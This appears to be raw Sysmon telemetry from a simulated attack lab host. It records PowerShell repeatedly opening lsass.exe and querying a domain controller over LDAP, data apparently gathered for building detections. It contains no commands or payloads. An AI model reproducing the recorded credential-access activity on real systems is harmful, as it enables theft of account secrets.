22:03:13.297{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129547Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.266{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129546Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.266{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129545Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.250{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129544Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.250{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129543Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.229{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129542Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.229{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129541Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.213{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129540Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.213{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129539Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.166{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129538Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.166{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129537Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.117{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129536Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:13.117{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035129560Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:14.334{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CCE3BF3D03E98B9BCD97E58C411EF6A,SHA256=0D59B629062F95225327E8652C43191C298A77787EC164D9DB57AF7335F1F59F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129559Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:14.250{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8AA149385C776308C352CD89F4A4CAEB,SHA256=11CCA5073AC3BD22EC1CEE432018E48AF24AFD9A735068E4F27A9708DFFDB10C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129571Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:15.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B0F81616144A31671E5FD92BC1DBBB2,SHA256=7628B61F1131EF168C8D1744A6F3153BCB0D32E6F72B2331FBBAC0931EB5EBF8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129570Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:39.632{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62302-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035129569Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:39.560{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62301-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035129568Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:39.525{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62300-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035129567Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:39.459{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62299-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035129566Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:39.422{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62298-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035129565Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:39.363{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62297-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035129564Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:39.316{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62296-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035129563Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:39.132{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62295-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035129562Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:39.101{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62294-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035129561Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:39.076{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62293-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035129573Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:41.416{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62303-false10.0.1.12-8000- 23542300x800000000000000035129572Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:16.379{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69AC2D60263364F5EC474EAFE3924F99,SHA256=A617F51AEF767BCE3E18DCE23AA325DFA2BD06BC1855A238B7312449C6859D5B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:17.410{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C1201882F65393D6627C0D94EA7D16D,SHA256=877451682B16EC830EF5A48DE0016248EB61279116B2A14E2B22447D3E7DF541,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129575Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:18.427{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8FFA5550AF091F32CB8E2A8B5729B8B,SHA256=8018AC23DDE45B1226F1E8A774CABCE90B8756408FA45621C13231232F9ED416,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:44.648{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62304-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:19.630{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=42E025FB846983B71D4173199BA59DE5,SHA256=A508538F45B9D43ED19FA81B9216E1FDDA8A54E8702B3157EF74349DE5D9E6D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129576Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:19.445{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3210B0E226745ECD7F3C43F918ECB3AB,SHA256=13A4AC55F26BA1E702C15A226A36485F549870DB72410447C487C375BAEB6218,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:20.460{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC5CC94E4D6A1626BEF7D1CB7AFDE84F,SHA256=DD386ACCF620172D5D44AD56A8CA4799F1FBF317581AA919C1D308D0647877E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129580Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:21.476{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18DFB0C3D86703DB6CE82577231AF66B,SHA256=25E945152E10F806297CB98B6C8F54E853441C9CF4E9DB69DECD9F6714B1EFD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:22.528{B81B27B7-4012-611D-0B00-00000000C801}6361040C:\Windows\system32\lsass.exe{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 